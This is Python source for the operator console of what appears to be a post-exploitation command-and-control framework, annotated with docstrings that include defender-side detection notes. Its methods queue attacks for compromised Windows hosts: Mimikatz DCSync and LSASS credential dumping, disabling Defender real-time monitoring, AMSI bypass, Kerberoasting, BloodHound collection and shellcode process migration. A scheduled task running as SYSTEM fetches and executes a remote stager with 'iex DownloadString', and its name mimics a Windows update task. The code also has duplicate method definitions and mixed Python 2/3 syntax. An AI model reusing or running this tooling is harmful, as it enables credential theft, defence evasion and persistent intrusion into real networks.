def download(self, args=None):
    """Queue a file download from the currently selected agent.

    Fills the agents/download.ninja template with the listener's HOST and
    PORT, the download_url path and the URL scheme (https when SSL is set),
    writes the result to Modules/download.ps1, then queues
    ``load download.ps1`` followed by ``dn -filename "<args[1]>"``.

    Args:
        args: command tokens; args[1] is the remote file name. Neither the
            ``None`` default nor a missing args[1] is checked, so both raise
            (TypeError / IndexError) instead of printing a usage line.

    NOTE: Python 2 ``print`` statement; other methods on this page use the
    function form, so the file cannot run unchanged on either interpreter.
    """
    if config.get_pointer() == 'main':
        print "you can't use this command in main ! chose an agent"
        return
    global loaded  # declared but never read or written in this method
    # Plain open/close: an exception in read() leaves the handle open.
    f = open("agents/download.ninja", "r")
    payload = f.read()
    f.close()
    # HOST, PORT, download_url and SSL are module globals defined outside this view.
    if SSL == True:
        payload = payload.replace('{ip}', HOST).replace(
            '{port}', PORT).replace('{download}', download_url).replace('{HTTP}', "https")
    else:
        payload = payload.replace('{ip}', HOST).replace(
            '{port}', PORT).replace('{download}', download_url).replace('{HTTP}', "http")
    f = open("Modules/download.ps1", "w")
    f.write(payload)
    f.close()
    # Leftover guard from an earlier version; the load is now unconditional.
    #if loaded["download"]==False:
    config.COMMAND[config.get_pointer()].append(
        encrypt(config.AESKey, "load download.ps1"))
    # args[1] is spliced into the command unescaped: a '"' in the name
    # breaks the quoting of the generated command.
    config.COMMAND[config.get_pointer()].append(
        encrypt(config.AESKey, "dn -filename \"" + args[1] + "\""))
def DA(self, args=None):
    """Queue ``load PowerView.ps1`` then ``load DA.ps1`` for the selected agent.

    What DA.ps1 does is not visible here. The ASBBypass.ps1 load is commented
    out in this version; a second ``DA`` definition further down this page
    loads it unconditionally and, being defined later in the class body,
    replaces this one at class-creation time.

    Args:
        args: unused.
    """
    if config.get_pointer()=='main':
        print ("you can't use this command in main ! chose an agent")
        return
    #config.COMMAND[config.get_pointer()].append(encrypt(config.AESKey,"load ASBBypass.ps1"))
    config.COMMAND[config.get_pointer()].append(encrypt(config.AESKey,"load PowerView.ps1"))
    config.COMMAND[config.get_pointer()].append(encrypt(config.AESKey,"load DA.ps1"))
def set_beacon(self, args=None):
    """Queue ``load download.ps1`` and a ``$beacon=<args[1]>`` assignment.

    args[1] is emitted verbatim as PowerShell source, so it is not validated
    as a number; a missing args[1] raises IndexError. Why the download module
    is loaded before setting the beacon interval is not explained by the
    code here.

    Args:
        args: command tokens; args[1] is the new beacon value.

    NOTE: Python 2 ``print`` statement (see ``download``).
    """
    if config.get_pointer()=='main':
        print "you can't use this command in main ! chose an agent"
        return
    global loaded  # declared but unused in this method
    config.COMMAND[config.get_pointer()].append(encrypt(config.AESKey,"load download.ps1"))
    config.COMMAND[config.get_pointer()].append(encrypt(config.AESKey,"$beacon="+args[1]))
def drm(self, args=None):
    """Queue ``Set-MpPreference -DisableRealtimeMonitoring 1`` on the selected agent.

    Defender-side note: this is a tamper action. Real-time protection being
    turned off is recorded in the Microsoft-Windows-Windows Defender/Operational
    log (Event ID 5001), and Tamper Protection rejects the Set-MpPreference
    change outright, so the queued command is both noisy and often ineffective.

    Args:
        args: unused.

    NOTE: Python 2 ``print`` statement (see ``download``).
    """
    if config.get_pointer() == 'main':
        print "you can't use this command in main ! chose an agent"
        return
    config.COMMAND[config.get_pointer()].append(
        encrypt(config.AESKey, "Set-MpPreference -DisableRealtimeMonitoring 1"))
def DA(self, args=None):
    """Queue loads of ASBBypass.ps1, PowerView.ps1 and DA.ps1 for the selected agent.

    Second definition of ``DA`` on this page (the earlier one carries a
    ``main`` guard and skips ASBBypass.ps1). Unlike the other agent commands
    this one does not check ``config.get_pointer() == 'main'``; presumably
    the ``config.COMMAND['main']`` lookup then fails — confirm.

    Args:
        args: unused.
    """
    config.COMMAND[config.get_pointer()].append(
        encrypt(config.AESKey, "load ASBBypass.ps1"))
    config.COMMAND[config.get_pointer()].append(
        encrypt(config.AESKey, "load PowerView.ps1"))
    config.COMMAND[config.get_pointer()].append(
        encrypt(config.AESKey, "load DA.ps1"))
def dcsync_list(self, args=None):
    """Queue Invoke-Mimikatz ``lsadump::dcsync`` for a list of user names.

    The names come either inline as a comma-separated list in args[1:] or,
    when no comma is present, from the file named by args[1] (newlines are
    turned into commas). The generated PowerShell walks the list in slices
    of five and runs one dcsync per name.

    Args:
        args: command tokens; ``len(args) < 2`` prints usage and returns.
            A ``None`` default raises TypeError inside the try and is only
            printed by the catch-all handler.

    Defender-side note: DCSync is a directory replication request from a
    non-domain-controller; it surfaces as Event ID 4662 with the
    DS-Replication-Get-Changes* control access rights.

    NOTE: no ``main`` guard here, unlike ``dcsync_admins``/``dcsync_all``;
    Python 2 ``print`` statements throughout.
    """
    user = []  # unused
    try:
        if len(args) < 2:
            print "Usage dcsunc_list <full file path>"  # typo: dcsync_list
            return
        print "grab some coffe this may take too long to finish if the users are more than 10"
        if len(' '.join(args[1:]).split(",")) > 1:
            users = ' '.join(args[1:]).replace(", ", ",").replace(" ,", ",")
        else:
            # Shadows the builtin `list`; the handle is not closed if read() raises.
            list = open(args[1], 'r')
            users = list.read()
            list.close()
            # A trailing newline in the file leaves an empty last element.
            users = users.replace("\n", ",")
        users = "".join(users)  # no-op: users is already a str
        config.COMMAND[config.get_pointer()].append(
            encrypt(config.AESKey, "load Invoke-Mimikatz.ps1"))
        config.COMMAND[config.get_pointer()].append(
            encrypt(
                config.AESKey,
                """$users=("{users}").split(",");For ($i=0; $i -le $users.Length; $i=$i+5) {echo $users[$i..($i+4)] | ForEach-Object { $t='"lsadump::dcsync /user:rep"';$t=$t.replace("rep",$_);Invoke-Mimikatz -Command $t}}""" .replace("{users}", users)))
    except Exception as e:
        # Catch-all: IOError from open() and TypeError from args=None end up here.
        print e
def dcsync_admins(self, args=None):
    """Queue ``lsadump::dcsync`` for every member of "Domain Admins".

    Loads Invoke-Mimikatz.ps1, then queues PowerShell that resolves the
    group membership with ``Get-ADGroupMember`` (ActiveDirectory module)
    and runs one dcsync per SamAccountName, five names per slice.

    Args:
        args: unused.

    Defender-side note: see ``dcsync_list`` — replication requests from a
    non-DC host show up as Event ID 4662 with DS-Replication-Get-Changes*
    rights, and the group lookup itself is an LDAP query against the DC.
    """
    if config.get_pointer()=='main':
        print ("you can't use this command in main ! chose an agent")
        return
    print ("grab some coffe this may take too long to finish if the domain admin users are more than 10")
    config.COMMAND[config.get_pointer()].append(encrypt(config.AESKey,"load Invoke-Mimikatz.ps1"))
    config.COMMAND[config.get_pointer()].append(encrypt(config.AESKey,"""$users=(Get-ADGroupMember -Identity "Domain Admins").SamAccountName;For ($i=0; $i -le $users.Length; $i=$i+5) {echo $users[$i..($i+4)] | ForEach-Object { $t='"lsadump::dcsync /user:rep"';$t=$t.replace("rep",$_);Invoke-Mimikatz -Command $t}}"""))
def persist_schtasks(self, args=None):
    """Interactively queue a ``schtasks /create`` command on the selected agent.

    Prompts the operator for a schedule type, then queues a task that runs
    PowerShell to fetch and ``iex`` the stager at
    ``{HTTP}://{ip}:{port}{payload}`` (HOST, PORT, SSL and raw_payload are
    module globals outside this view).

    Args:
        args: unused.

    Known defects (documented, not fixed here):
      * The ``try`` body contains only assignments and can never raise, so
        the ``except`` branch and its "wrong schedule type" message are
        unreachable. An unrecognised word longer than one character leaves
        the loop with ``freq`` unbound and the final ``.replace`` raises
        NameError.
      * Under Python 2 ``input()`` evaluates the typed text as an expression
        (``raw_input`` is the literal-string equivalent); under Python 3 it
        returns a str as intended.

    Defender-side note: task creation is logged (Security Event ID 4698 with
    object-access auditing, and Microsoft-Windows-TaskScheduler/Operational
    Event ID 106). The task path imitates the built-in
    ``\\Microsoft\\Windows\\UpdateOrchestrator`` folder but with an extra
    ``s``, a cheap thing to alert on.
    """
    if config.get_pointer()=='main':
        print ("you can't use this command in main ! chose an agent")
        return
    CC=''
    while len(CC) == 0:
        CC = input('please enter schedule type ( hourly , daily , weekly , onstart) or type exit to exit the persistence module')
        if len(CC)>1:
            try:
                if CC=='hourly':
                    freq="Hourly"
                    break;
                if CC== 'daily':
                    freq='Daily'
                    break
                if CC== 'onstart':
                    freq='onstart'
                    break
                if CC== 'weekly':
                    freq='weekly'
                    break
                if CC=='exit':
                    return
            except:
                # Unreachable: nothing above can raise.
                print ("you entered wrong schedule type")
                CC=''
                continue
        else:
            CC=''
            continue
    if SSL==True:
        http="https"
    else:
        http="http"
    # Non-raw string: "\S" is kept literally, "\\" collapses to a single backslash.
    config.COMMAND[config.get_pointer()].append(encrypt(config.AESKey,"""schtasks /F /create /SC {freq} /RU "NT Authority\SYSTEM" /TN "\\Microsoft\\Windows\\UpdateOrchestrators\\AC Power install" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''{HTTP}://{ip}:{port}{payload}''')'\"""".replace('{ip}', HOST).replace('{port}', PORT).replace('{payload}', raw_payload).replace('{HTTP}', http).replace('{freq}', freq)))
def kerb(self, args=None):
    """Queue loads of Find-PSServiceAccounts.ps1, Invoke-Kerberoast.ps1 and kerb.ps1.

    The ASBBypass.ps1 load is commented out here; the later ``kerb``
    definition on this page includes it and replaces this one at
    class-creation time.

    Args:
        args: unused.

    Defender-side note: Kerberoasting shows up as a burst of TGS requests
    (Event ID 4769) for service accounts, typically with the RC4 encryption
    type (0x17).
    """
    if config.get_pointer()=='main':
        print ("you can't use this command in main ! chose an agent")
        return
    #config.COMMAND[config.get_pointer()].append(encrypt(config.AESKey,"load ASBBypass.ps1"))
    config.COMMAND[config.get_pointer()].append(encrypt(config.AESKey,"load Find-PSServiceAccounts.ps1"))
    config.COMMAND[config.get_pointer()].append(encrypt(config.AESKey,"load Invoke-Kerberoast.ps1"))
    config.COMMAND[config.get_pointer()].append(encrypt(config.AESKey,"load kerb.ps1"))
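def load(self, args=None):
    """Queue the text of ``Modules/<args[1]>`` as an encrypted command.

    Args:
        args: command tokens; args[1] is a file name under ``Modules/``.
            A missing args[1] raises IndexError; an unreadable file raises
            IOError/OSError. The path is not normalised, so this is
            operator-controlled input only.
    """
    if config.get_pointer()=='main':
        print ("you can't use this command in main ! chose an agent")
        return
    # Context manager: the handle is released even when read() raises
    # (the previous version only closed it after the append succeeded).
    with open('Modules/' + args[1], 'r') as fpm:
        module = fpm.read()
    config.COMMAND[config.get_pointer()].append(encrypt(config.AESKey,module))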
def exit(self, args=None):
    """Exit the console, or tell the selected agent to terminate.

    In the ``main`` context this calls ``os._exit(0)``, which ends the
    process immediately without running atexit handlers or flushing
    buffers. With an agent selected it queues ``kill <AGENTS[ptr][8]>``
    instead; what record index 8 holds is not visible here (presumably an
    agent/process identifier — confirm).

    Args:
        args: unused.
    """
    if config.get_pointer() == 'main':
        os._exit(0)
    else:
        #config.COMMAND[config.get_pointer()].append(encrypt(config.AESKey,"exit"))
        config.COMMAND[config.get_pointer()].append(
            encrypt(config.AESKey, "kill " + config.AGENTS[config.get_pointer()][8]))
def kerb(self, args=None):
    """Queue loads of ASBBypass.ps1, Find-PSServiceAccounts.ps1, Invoke-Kerberoast.ps1 and kerb.ps1.

    Second ``kerb`` definition on this page; it lacks the ``main`` guard of
    the first one, so a ``config.COMMAND['main']`` lookup is attempted when
    no agent is selected (presumably a KeyError — confirm).

    Args:
        args: unused.

    Defender-side note: see the first ``kerb`` — Event ID 4769 bursts with
    RC4 encryption type.
    """
    config.COMMAND[config.get_pointer()].append(
        encrypt(config.AESKey, "load ASBBypass.ps1"))
    config.COMMAND[config.get_pointer()].append(
        encrypt(config.AESKey, "load Find-PSServiceAccounts.ps1"))
    config.COMMAND[config.get_pointer()].append(
        encrypt(config.AESKey, "load Invoke-Kerberoast.ps1"))
    config.COMMAND[config.get_pointer()].append(
        encrypt(config.AESKey, "load kerb.ps1"))
def bloodhound(self, args=None):
    """Queue ``load SharpHound.ps1`` and an ``Invoke-BloodHound`` collection run.

    The zip name is five uppercase letters from ``random`` — adequate for a
    non-secret file name. No ``main`` guard in this definition (compare the
    later ``bloodhound`` on this page, which has one and replaces this one
    at class-creation time).

    Args:
        args: unused.

    Defender-side note: ``-CollectionMethod All`` produces a burst of LDAP
    queries against the DC and session/local-group enumeration against
    many hosts from a single source.
    """
    config.COMMAND[config.get_pointer()].append(
        encrypt(config.AESKey, "load SharpHound.ps1"))
    config.COMMAND[config.get_pointer()].append(
        encrypt(
            config.AESKey,
            "Invoke-BloodHound -CollectionMethod All -NoSaveCache -RandomFilenames -ZipFileName " + "".join(
                [random.choice(string.ascii_uppercase) for i in range(5)])))
def dcsync_all(self, args=None):
    """Queue ``lsadump::dcsync /domain:<domain> /all /csv`` on the selected agent.

    The domain is taken from ``config.AGENTS[ptr][6]``; the placeholder
    name suggests index 6 is the agent's domain, but the record layout is
    not visible here — confirm.

    Args:
        args: unused.

    Defender-side note: see ``dcsync_list`` (Event ID 4662 with
    DS-Replication-Get-Changes* rights from a non-DC).

    NOTE: Python 2 ``print`` statement (see ``download``).
    """
    if config.get_pointer() == 'main':
        print "you can't use this command in main ! chose an agent"
        return
    config.COMMAND[config.get_pointer()].append(
        encrypt(config.AESKey, "load Invoke-Mimikatz.ps1"))
    config.COMMAND[config.get_pointer()].append(
        encrypt(
            config.AESKey,
            """Invoke-Mimikatz -Command '"lsadump::dcsync /domain:{domain} /all /csv"'""" .replace("{domain}", config.AGENTS[config.get_pointer()][6])))
def dumpcreds(self, args=None):
    """Queue ``privilege::debug`` + ``sekurlsa::logonpasswords`` via Invoke-Mimikatz.

    Args:
        args: unused.

    Defender-side note: this reads LSASS memory. Sysmon Event ID 10
    (ProcessAccess) on lsass.exe from a PowerShell host is the usual
    detection; Credential Guard and LSA protection (RunAsPPL) limit what
    can be read.

    NOTE: Python 2 ``print`` statement (see ``download``).
    """
    if config.get_pointer() == 'main':
        print "you can't use this command in main ! chose an agent"
        return
    config.COMMAND[config.get_pointer()].append(
        encrypt(config.AESKey, "load Invoke-Mimikatz.ps1"))
    config.COMMAND[config.get_pointer()].append(
        encrypt(
            config.AESKey,
            """Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonpasswords"'""" ))
def bloodhound(self, args=None):
    """Queue ``load SharpHound.ps1`` and an ``Invoke-BloodHound`` collection run.

    Same command sequence as the earlier ``bloodhound`` on this page, with
    the ``main`` guard added. The zip name is five uppercase letters drawn
    with ``random`` (fine for a non-secret file name).

    Args:
        args: unused.

    Defender-side note: see the first ``bloodhound`` — LDAP query bursts
    and wide session enumeration from one host.

    NOTE: Python 2 ``print`` statement (see ``download``).
    """
    if config.get_pointer() == 'main':
        print "you can't use this command in main ! chose an agent"
        return
    config.COMMAND[config.get_pointer()].append(
        encrypt(config.AESKey, "load SharpHound.ps1"))
    config.COMMAND[config.get_pointer()].append(
        encrypt(
            config.AESKey,
            "Invoke-BloodHound -CollectionMethod All -NoSaveCache -RandomFilenames -ZipFileName " + "".join(
                [random.choice(string.ascii_uppercase) for i in range(5)])))
def migrate(self, args=None):
    """Build Modules/Migrator.ps1 from a template and queue ``load Migrator.ps1``.

    ``donut.create`` (third-party) turns payloads/dropper_cs.exe into
    shellcode, which is base64-encoded into the ``{shellcode}`` placeholder
    of agents/Migrator.ninja; ``{class}`` gets a random five-letter name.
    What Migrator.ps1 then does on the agent is not visible here.

    Args:
        args: unused.

    NOTE: ``fp`` is never closed; ``output`` is closed explicitly.
    ``global loaded`` is declared but unused.
    """
    if config.get_pointer()=='main':
        print ("you can't use this command in main ! chose an agent")
        return
    global loaded
    shellcode=donut.create(file="payloads/dropper_cs.exe")
    fp = open('agents/Migrator.ninja', 'r')  # never closed
    temp = fp.read()
    temp=temp.replace('{shellcode}',base64.b64encode(shellcode).decode("utf-8")).replace('{class}',"".join([random.choice(string.ascii_uppercase) for i in range(5)]))
    output=open('Modules/Migrator.ps1', 'w')
    output.write(temp)
    output.close()
    config.COMMAND[config.get_pointer()].append(encrypt(config.AESKey,"load Migrator.ps1"))
def get_groups(self, args=None):
    """Queue a DirectorySearcher query for the ``memberOf`` of one user.

    Loads PowerView.ps1, then queues an LDAP lookup whose filter embeds
    args[1:] unescaped inside ``(samAccountName=$("..."))``. Characters
    special to LDAP filters (``*``, ``(``, ``)``, ``\\``) or to PowerShell
    strings in the name therefore change the query rather than match
    literally — operator-controlled input, but worth knowing.

    Args:
        args: command tokens; ``len(args) < 2`` prints usage and returns.

    NOTE: the tokens are joined with the literal ``'******'``; ``get_users``
    joins with a single space, so this looks like an artefact rather than
    intent — confirm against the original file before relying on it.
    """
    if config.get_pointer()=='main':
        print ("you can't use this command in main ! chose an agent")
        return
    try :
        if len(args) < 2:
            print ("Usage get_groups <user name>")
            return
        user='******'.join(args[1:])
        config.COMMAND[config.get_pointer()].append(encrypt(config.AESKey,"load PowerView.ps1"))
        user="""(New-Object System.DirectoryServices.DirectorySearcher("(&(objectCategory=User)(samAccountName=$("{user}")))")).FindOne().GetDirectoryEntry().memberOf""".replace("{user}",user)
        config.COMMAND[config.get_pointer()].append(encrypt(config.AESKey,user))
    except Exception as e:
        # Catch-all; TypeError from args=None lands here too.
        print (e)
def get_users(self, args=None):
    """Queue ``Get-DomainGroupMember -Identity "<group>" -Recurse`` (PowerView).

    The group name is args[1:] joined with spaces and spliced into a
    double-quoted PowerShell string without escaping, so a ``"`` or ``$``
    in the name alters the command.

    Args:
        args: command tokens; ``len(args) < 2`` prints usage and returns.

    A second ``get_users`` (Python 2 ``print``, no ``main`` guard) follows
    on this page and replaces this one at class-creation time.
    """
    if config.get_pointer()=='main':
        print ("you can't use this command in main ! chose an agent")
        return
    try :
        if len(args) < 2:
            print ("Usage get_users <group name>")
            return
        group=' '.join(args[1:])
        config.COMMAND[config.get_pointer()].append(encrypt(config.AESKey,"load PowerView.ps1"))
        group="""Get-DomainGroupMember -Identity "{group}" -Recurse""".replace("{group}",group)
        config.COMMAND[config.get_pointer()].append(encrypt(config.AESKey,group))
    except Exception as e:
        # Catch-all; TypeError from args=None lands here too.
        print (e)
def get_users(self, args=None):
    """Queue ``Get-DomainGroupMember -Identity "<group>" -Recurse`` (PowerView).

    Python 2 variant of ``get_users``: no ``main`` guard, ``print``
    statements. Same unescaped splice of the group name into a
    double-quoted PowerShell string as the other definition.

    Args:
        args: command tokens; ``len(args) < 2`` prints usage and returns.
    """
    try:
        if len(args) < 2:
            print "Usage get_users <group name>"
            return
        group = ' '.join(args[1:])
        config.COMMAND[config.get_pointer()].append(
            encrypt(config.AESKey, "load PowerView.ps1"))
        group = """Get-DomainGroupMember -Identity "{group}" -Recurse""".replace(
            "{group}", group)
        config.COMMAND[config.get_pointer()].append(
            encrypt(config.AESKey, group))
    except Exception as e:
        # Catch-all; TypeError from args=None lands here too.
        print e
def screenshot(self, args=None):
    """Build Modules/screenshot.ps1 from its template and queue a capture.

    Fills agents/screenshot.ninja with HOST, PORT, image_url, command_url
    and the URL scheme (https when SSL is set), writes Modules/screenshot.ps1,
    then queues ``load screenshot.ps1`` and ``scr -test 0 `` (note the
    trailing space in the command string).

    Args:
        args: unused.

    NOTE: same open/close pattern as ``download`` — the read handle stays
    open if read() raises.
    """
    if config.get_pointer()=='main':
        print ("you can't use this command in main ! chose an agent")
        return
    f=open("agents/screenshot.ninja","r")
    payload=f.read()
    f.close()
    # HOST, PORT, image_url, command_url and SSL are module globals outside this view.
    if SSL==True:
        payload=payload.replace('{ip}', HOST).replace('{port}', PORT).replace('{image}', image_url).replace('{cmd}', command_url).replace('{HTTP}', "https")
    else:
        payload=payload.replace('{ip}', HOST).replace('{port}', PORT).replace('{image}', image_url).replace('{cmd}', command_url).replace('{HTTP}', "http")
    f=open("Modules/screenshot.ps1","w")
    f.write(payload)
    f.close()
    config.COMMAND[config.get_pointer()].append(encrypt(config.AESKey,"load screenshot.ps1"))
    config.COMMAND[config.get_pointer()].append(encrypt(config.AESKey,"scr -test 0 "))
def downloads(self, args=None):
    """Print the names of the files in the local ``downloads`` directory.

    Uses the same ``main`` guard as the agent commands even though the
    listing is entirely local. Prints one entry per line, or a notice when
    the directory does not exist.

    Args:
        args: unused.
    """
    if config.get_pointer()=='main':
        print ("you can't use this command in main ! chose an agent")
        return
    if not os.path.isdir("downloads"):
        print ("[-] downloads directory not Available")
        return
    for entry in os.listdir("downloads"):
        print (entry)
def delete(self, args=None):
    """Remove one agent record from ``config.AGENTS`` by its numeric id.

    Switches the console back to ``main`` first. Prints usage when no id
    is given; an id that matches no record is silently ignored.

    Args:
        args: command tokens; args[1] is compared with
            ``str(config.AGENTS[key][0])`` for each record.

    NOTE: Python 2 ``print`` statement, kept as in the original.
    """
    if config.get_pointer() != 'main':
        config.set_pointer('main')
    if len(args) < 2:
        print "delete <id>"
        return
    wanted = args[1]
    # First key whose record id matches, or '' when there is none.
    found = next(
        (key for key in config.AGENTS if wanted == str(config.AGENTS[key][0])),
        '')
    if found != '':
        del config.AGENTS[found]
def delete_all(self, args=None):
    """Forget every agent record and return the console to ``main``.

    Only the console-side registry is emptied; nothing is sent to the
    agents themselves (``kill_all`` does that).

    Args:
        args: unused.
    """
    current = config.get_pointer()
    if current != 'main':
        config.set_pointer('main')
    config.AGENTS.clear()
def dis_amsi(self, args=None):
    """Queue ``load AMSI_Bypass.ps1`` on the selected agent.

    Args:
        args: unused.

    Defender-side note: the bypass script itself is still subject to
    PowerShell script block logging (Event ID 4104) when it is loaded, and
    Defender reports AMSI tampering attempts.
    """
    if config.get_pointer()=='main':
        print ("you can't use this command in main ! chose an agent")
        return
    config.COMMAND[config.get_pointer()].append(encrypt(config.AESKey,"load AMSI_Bypass.ps1"))
def unamanged_powershell(self, args=None):
    """Queue ``loadpsh payload-obf.ps1`` on the selected agent.

    Method name is misspelled (``unmanaged``); renaming would break the
    console's command dispatch, so it is left as is. ``global loaded`` is
    declared but unused.

    Args:
        args: unused.
    """
    if config.get_pointer()=='main':
        print ("you can't use this command in main ! chose an agent")
        return
    global loaded
    config.COMMAND[config.get_pointer()].append(encrypt(config.AESKey,"loadpsh payload-obf.ps1"))
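def load(self, args=None):
    """Queue the text of ``Modules/<args[1]>`` as an encrypted command.

    Second ``load`` definition on this page; unlike the first it has no
    ``main`` guard, so with no agent selected the ``config.COMMAND['main']``
    lookup is attempted (presumably a KeyError — confirm).

    Args:
        args: command tokens; args[1] is a file name under ``Modules/``.
            A missing args[1] raises IndexError; an unreadable file raises
            IOError/OSError.
    """
    # Context manager: the handle is released even when read() raises
    # (the previous version only closed it after the append succeeded).
    with open('Modules/' + args[1], 'r') as fpm:
        module = fpm.read()
    config.COMMAND[config.get_pointer()].append(
        encrypt(config.AESKey, module))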
def kill_all(self, args=None):
    """Queue a ``kill <record[8]>`` command for every known agent.

    Moves the console to ``main`` first. The records stay in
    ``config.AGENTS`` afterwards (``delete_all`` removes them). What record
    index 8 holds is not visible here — presumably an agent/process
    identifier, as in ``exit``.

    Args:
        args: unused.
    """
    if config.get_pointer() != 'main':
        config.set_pointer('main')
    for agent_key, record in config.AGENTS.items():
        kill_cmd = "kill " + record[8]
        config.COMMAND[agent_key].append(encrypt(config.AESKey, kill_cmd))
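def load(self, args=None):
    """Queue the text of ``Modules/<args[1]>`` as a command for the selected agent.

    Third ``load`` definition on this page. It differs from the other two
    in that the module text is appended without ``encrypt(config.AESKey, …)``;
    whether the agent expects plaintext here is not visible, so that
    behaviour is preserved unchanged. No ``main`` guard either.

    Args:
        args: command tokens; args[1] is a file name under ``Modules/``.
            A missing args[1] raises IndexError; an unreadable file raises
            IOError/OSError.
    """
    # Context manager: the original never closed the handle at all.
    with open('Modules/' + args[1], 'r') as fpm:
        module = fpm.read()
    config.COMMAND[config.get_pointer()].append(module)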